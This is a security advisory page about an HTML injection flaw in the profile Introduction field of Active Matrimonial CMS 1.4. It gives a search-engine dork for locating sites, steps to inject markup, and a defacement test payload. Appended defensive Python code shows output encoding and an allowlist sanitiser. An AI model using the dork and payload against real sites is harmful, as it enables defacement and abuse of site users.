Active Matrimonial CMS v 1.4 HTML inject Vulnerability - CXSecurity.com

Vulnerability ID 1464804 Vulnerability type
Published 2019-01-31 Updated 2019-01-31
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2019010301
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit (EXP)
====================================================================================================================================
| # Title     : Active Matrimonial CMS v 1.4 HTML inject Vulnerability                                                             |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | 
| # Vendor    : https://activeitzone.com/                                                                                          |  
| # Dork      : "Copyright © 2019 Active Matrimonial CMS - All Rights Reserved "                                                   |
====================================================================================================================================


PoC:

[+] Search for the dork in Google or another search engine.

[+] Register a new member.

[+] Go to edit your profile: http://xywars.com/home/profile

[+] In the Introduction box, put your code or use this code for a test:

<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>
</tr>
<td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a>
</tr>

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |        
                                                                                                                                      |
=======================================================================================================================================
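
The PoC above works because markup typed into the Introduction box is rendered as HTML on the profile page. The following is an added defensive example, not code from the advisory or from the vendor: it shows output encoding of the field and, as an alternative, a tag-allowlist sanitiser. The function names, the class name and the allowlist are assumptions chosen for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Assumption: the Introduction field may keep these attribute-free formatting tags.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br"}
VOID_TAGS = {"br"}


def render_plain(intro: str) -> str:
    """Strict fix: treat the field as text and encode it at output time."""
    return escape(intro, quote=True)


class IntroSanitizer(HTMLParser):
    """Re-emits allowlisted tags without attributes; drops all other markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open_tags = [], []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")  # attrs (style, on* handlers) are discarded
            if tag not in VOID_TAGS:
                self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open_tags:
            # Close everything opened after `tag` so the output stays balanced.
            while self.open_tags:
                closing = self.open_tags.pop()
                self.out.append(f"</{closing}>")
                if closing == tag:
                    break

    def handle_data(self, data):
        self.out.append(escape(data, quote=True))


def sanitize_intro(intro: str) -> str:
    """Allowlist variant: keep basic formatting, neutralise everything else."""
    parser = IntroSanitizer()
    parser.feed(intro)
    parser.close()
    while parser.open_tags:  # close tags the user left open
        parser.out.append(f"</{parser.open_tags.pop()}>")
    return "".join(parser.out)


# Test string from the advisory above.
POC = "<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>"
```

Encoding at render time (`render_plain`) is the safer default; the allowlist variant only makes sense if members are meant to use basic formatting in their introduction.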